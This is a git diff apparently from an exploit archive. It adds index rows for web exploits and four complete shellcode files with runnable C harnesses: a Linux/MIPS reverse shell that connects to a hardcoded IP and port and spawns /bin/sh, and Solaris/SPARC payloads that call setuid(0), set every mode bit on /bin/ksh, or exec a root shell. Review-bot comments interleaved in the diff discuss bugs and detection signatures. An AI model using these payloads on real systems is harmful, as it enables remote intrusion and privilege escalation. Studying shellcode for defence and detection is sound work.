@@ -44821,3 +44830,7 @@ id,file,description,date,author,type,platform,port
 50741,exploits/multiple/webapps/50741.py,"ServiceNow - Username Enumeration",1970-01-01,"Victor Hanna",webapps,multiple,
 50744,exploits/hardware/webapps/50744.txt,"Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware,
 50746,exploits/php/webapps/50746.txt,"WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
+50752,exploits/php/webapps/50752.txt,"WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation",1970-01-01,"numan türle",webapps,php,
+50753,exploits/php/webapps/50753.py,"WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Overthinker1877,webapps,php,
+50754,exploits/php/webapps/50754.py,"Hotel Druid 3.0.3 - Remote Code Execution (RCE)",1970-01-01,0z09e,webapps,php,
+50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Braiant Giraldo Villa",webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 5dabbd8c3..587f2c638 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
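Review bot: The new 50752 row records the author as `"numan türle"` while the advisory header in 50752.txt reads `Numan Türle`; the index is the searchable field, so it should carry the name as the author wrote it. The 50764 row also inherits the title inconsistency from that file (`'ConnectifyService'` is the executable, `Connectify` is the service name shown by `sc qc`), so the two should be corrected together. The remaining rows match their files.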
@@ -1046,3 +1046,7 @@ id,file,description,date,author,type,platform
 50710,shellcodes/windows_x86/50710.asm,"Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)",1970-01-01,Techryptic,shellcode,windows_x86
 50711,shellcodes/windows_x86/50711.asm,"Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86
 50722,shellcodes/windows_x86/50722.asm,"Windows/x86 - Locate kernel32 base address / Stack Crack method NullFree Shellcode (171 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86
+50748,shellcodes/solaris_sparc/50748.c,"Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
+50749,shellcodes/solaris_sparc/50749.c,"Solaris/SPARC - chmod(./me) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
+50750,shellcodes/solaris_sparc/50750.c,"Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode",1970-01-01,"Marco Ivaldi",shellcode,solaris_sparc
+50751,shellcodes/linux_mips/50751.c,"Linux/MIPS - N32 MSB Reverse Shell Shellcode",1970-01-01,"Marco Ivaldi",shellcode,linux_mips
diff --git a/shellcodes/linux_mips/50751.c b/shellcodes/linux_mips/50751.c
new file mode 100644
index 000000000..d732c2d4d
--- /dev/null
+++ b/shellcodes/linux_mips/50751.c
@@ -0,0 +1,90 @@ +/* + * mips_n32_msb_linux_revsh.c - MIPS N32 MSB Linux reverse + * Copyright (c) 2022 Marco Ivaldi + * + * Basic MIPS N32 MSB Linux reverse shellcode, showcasing various + * techniques to avoid badchars. + * + * Cross-compile (https://buildroot.org/) with: + * $ mips64-linux-gcc -static mips_n32_msb_linux_revsh.c -o revsh + * + * Tested on Linux MIPS64 Cavium Octeon III. I placed the shellcode on the + * stack, because on my test device the .data section was not executable. + * + * Based on https://youtu.be/0-_Wtz5L9ZY by Evan Walls at tacnetsol.com. + */ + +void main() +{ + char sc[] = + + // sub technique + "\x24\x0d\xff\xfa" // li $t1, -6 + "\x01\xa0\x68\x27" // nor $t1, $zero # 5 + + // sock = socket(2, 2, 0) + "\x25\xa4\xff\xfd" // addiu $a0, $t1, -3 # 2 + "\x25\xa5\xff\xfd" // addiu $a1, $t1, -3 # 2 + "\x25\xa6\xff\xfb" // addiu $a2, $t1, -5 # 0 + "\x24\x02\x17\x98" // li $v0, 0x1798 # socket (0x1798) + "\x01\x01\x01\x0c" // syscall 0x40404 + "\x24\x50\x10\x10" // addiu $s0, $v0, 0x1010 # sock + 0x1010 + + // xor technique + "\x24\x0e\x21\x21" // li $t2, 0x2121 + + // connect(sock, {2, 0x5ac2, 0x5db8d822}, 16) + "\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock + "\x39\xcc\x21\x23" // xori $t0, $t2, 0x2123 # 2 + "\xa7\xac\xff\xec" // sh $t0, -20($sp) + "\x24\x0c\x5a\xc2" // li $t0, 0x5ac2 # 23234 << XXX port + "\xa7\xac\xff\xee" // sh $t0, -18($sp) + "\x24\x0c\x5d\xb8" // li $t0, 0x5db8 # 93.184 << XXX ip1 + "\xa7\xac\xff\xf0" // sh $t0, -16($sp) + "\x34\x0c\xd8\x22" // li $t0, 0xd822 # 216.34 << XXX ip2 + "\xa7\xac\xff\xf2" // sh $t0, -14($sp) + "\x27\xa5\xff\xec" // addiu $a1, $sp, -20 + "\x39\xc6\x21\x31" // xori $a2, $t2, 0x2131 # 16 + "\x24\x02\x17\x99" // li $v0, 0x1799 # connect (0x1799) + "\x01\x01\x01\x0c" // .byte 0x01, 0x01, 0x01, 0x0c # syscall + + // add overflow technique + "\x24\x0f\x7f\x7f" // li $t3, 0x7f7f + + // dup2(sock, 0) + "\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock + "\x25\xe5\x80\x81" // addiu $a1, $t3, 
0x8081 # 0 + "\x24\x02\x17\x90" // dup2 (0x1790) + "\x01\x01\x01\x0c" // syscall 0x40404 + + // dup2(sock, 1) + "\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock + "\x25\xe5\x80\x82" // addiu $a1, $t3, 0x8082 # 1 + "\x24\x02\x17\x90" // dup2 (0x1790) + "\x01\x01\x01\x0c" // syscall 0x40404 + + // dup2(sock, 2) + "\x26\x04\xef\xf0" // addiu $a0, $s0, -0x1010 # sock + "\x25\xe5\x80\x83" // addiu $a1, $t3, 0x8083 # 2 + "\x24\x02\x17\x90" // dup2 (0x1790) + "\x01\x01\x01\x0c" // syscall 0x40404 + + // execve("/bin/sh", ["/bin/sh"], 0) + "\x3c\x0c\x2f\x62" // lui $t0, 0x2f62 # "/b" + "\x25\x8c\x69\x6e" // addiu $t0, 0x696e # "in" + "\xaf\xac\xff\xec" // sw $t0, -20($sp) + "\x3c\x0c\x2f\x73" // lui $t0, 0x2f73 # "/s" + "\x25\x8c\x68\x68" // addiu $t0, 0x6868 # "hh" + "\xaf\xac\xff\xf0" // sw $t0, -16($sp) + "\xa3\xa0\xff\xf3" // sb $zero, -13($sp) # NUL + "\x27\xa4\xff\xec" // addiu $a0, $sp, -20 + "\xaf\xa4\xff\xf8" // sw $a0, -8($sp) + "\xaf\xa0\xff\xfc" // sw $zero, -4($sp) + "\x27\xa5\xff\xf8" // addiu $a1, $sp, -8 + "\x28\x06\xff\xff" // slti $a2, $zero, -1 # 0 (slti technique) + "\x24\x02\x17\xa9" // li $v0, 0x17a9 # execve (0x17a9) + "\x01\x01\x01\x0c"; // syscall 0x40404 + + void (*f)() = (void *)sc; + f(); +} \ No newline at end of file diff --git a/shellcodes/solaris_sparc/50748.c b/shellcodes/solaris_sparc/50748.c new file mode 100644 index 000000000..e22f7b998 --- /dev/null +++ b/shellcodes/solaris_sparc/50748.c 
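Review bot: `void main()` is not a valid signature for a hosted C program; the harness should read `int main(void)` and `return 0;` — the same applies to 50748, 50749 and 50750 in this commit. The header explains that `sc` lives on the stack because `.data` was not executable on the test device, but the `mips64-linux-gcc -static` line it gives does not say how the stack was made executable; if the toolchain needs `-z execstack` for this to run, the comment should state it (I cannot confirm from here which default that toolchain uses). For detection authors, every syscall here is emitted as `\x01\x01\x01\x0c` (annotated `syscall 0x40404`) instead of the canonical all-zero code field, which the kernel ignores, so signatures keyed on the canonical MIPS `syscall` bytes must mask the 20-bit code field or they will miss this family; and the `XXX` marks on the `li $t0, 0x5ac2` / `0x5db8` / `0xd822` lines should be called out in the header as the fields that hold the connect-back endpoint. The comment style also drifts between `// syscall 0x40404` and `// .byte 0x01, 0x01, 0x01, 0x0c # syscall` for the same instruction; pick one.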
@@ -0,0 +1,38 @@
+/*
+ * sparc_solaris_chmod.c - Solaris/SPARC chmod() shellcode
+ * Copyright (c) 2022 Marco Ivaldi
+ *
+ * Solaris/SPARC setuid/chmod/exit shellcode.
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
+ */
+
+char sc[] = /* Solaris/SPARC chmod() shellcode (12 + 32 + 20 = 64 bytes) */
+
+/* setuid(0) */
+"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
+"\x82\x10\x20\x17" /* mov 0x17, %g1 */
+"\x91\xd0\x20\x08" /* ta 8 */
+
+/* chmod("/bin/ksh", 037777777777) */
+"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
+"\x20\xbf\xff\xff" /* bn,a */
+"\x20\xbf\xff\xff" /* bn,a */
+"\x7f\xff\xff\xff" /* call */
+"\x90\x03\xe0\x20" /* add %o7, 0x20, %o0 */
+"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
+"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
+"\x91\xd0\x20\x08" /* ta 8 */
+
+/* exit(0) */
+"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
+"\x82\x10\x20\x01" /* mov 1, %g1 */
+"\x91\xd0\x20\x08" /* ta 8 */
+"/bin/ksh";
+
+void main()
+{
+ void (*f)() = (void *)sc;
+ f();
+}
\ No newline at end of file
diff --git a/shellcodes/solaris_sparc/50749.c b/shellcodes/solaris_sparc/50749.c
new file mode 100644
index 000000000..aee0fddef
--- /dev/null
+++ b/shellcodes/solaris_sparc/50749.c
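Review bot: `clr [ %o0 + 8 ]` stores a 4-byte zero at offsets 8–11 past the start of `"/bin/ksh"`, and with `%o0` pointing at the string that is bytes 64–67 of a `char sc[]` whose size is 65 (64 bytes plus the literal's NUL), so the test harness writes three bytes past the end of the global; give the array slack, e.g. `char sc[128] =` with the same initializer, or state in the header that the payload must be placed in a buffer with writable room after it. 50749 has the same shape (`clr [ %o0 + 4 ]` lands 3 bytes past `"./me"`), and 50750 is wider: the NUL at `[ %o0 + 8 ]` plus the argv array at `[ %o0 + 0x10 ]` / `[ %o0 + 0x14 ]` reach about 16 bytes beyond its 60-byte payload. Separately, a successful run of this file leaves `/bin/ksh` with every mode bit set by `chmod("/bin/ksh", 037777777777)` — including setuid — and nothing restores it; the header should say so, since a setuid `/bin/ksh` is a persistent change to a test system and the thing a responder would look for afterwards.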
@@ -0,0 +1,29 @@
+/*
+ * sparc_solaris_chmod2.c - Solaris/SPARC chmod() shellcode
+ * Copyright (c) 2022 Marco Ivaldi
+ *
+ * Very small Solaris/SPARC chmod shellcode. See also:
+ * http://phrack.org/issues/70/13.html#article
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
+ */
+
+char sc[] = /* Solaris/SPARC chmod() shellcode (max size is 36 bytes) */
+
+/* chmod("./me", 037777777777) */
+"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
+"\x20\xbf\xff\xff" /* bn,a */
+"\x20\xbf\xff\xff" /* bn,a */
+"\x7f\xff\xff\xff" /* call */
+"\x90\x03\xe0\x14" /* add %o7, 0x14, %o0 */
+"\xc0\x22\x20\x04" /* clr [ %o0 + 4 ] */
+"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
+"\x91\xd0\x20\x08" /* ta 8 */
+"./me";
+
+void main()
+{
+ void (*f)() = (void *)sc;
+ f();
+}
\ No newline at end of file
diff --git a/shellcodes/solaris_sparc/50750.c b/shellcodes/solaris_sparc/50750.c
new file mode 100644
index 000000000..8a25bb8c9
--- /dev/null
+++ b/shellcodes/solaris_sparc/50750.c
@@ -0,0 +1,35 @@
+/*
+ * sparc_solaris_exec.c - Solaris/SPARC execve() shellcode
+ * Copyright (c) 2022 Marco Ivaldi
+ *
+ * Pretty standard Solaris/SPARC setuid/execve shellcode.
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
+ */
+
+char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */
+
+/* setuid(0) */
+"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
+"\x82\x10\x20\x17" /* mov 0x17, %g1 */
+"\x91\xd0\x20\x08" /* ta 8 */
+
+/* execve("/bin/ksh", argv, NULL) */
+"\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */
+"\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */
+"\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */
+"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
+"\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */
+"\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */
+"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
+"\x91\xd0\x20\x08" /* ta 8 */
+"\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */
+"\x41\x41\x41\x41" /* placeholder */
+"/bin/ksh";
+
+void main()
+{
+ void (*f)() = (void *)sc;
+ f();
+}
\ No newline at end of file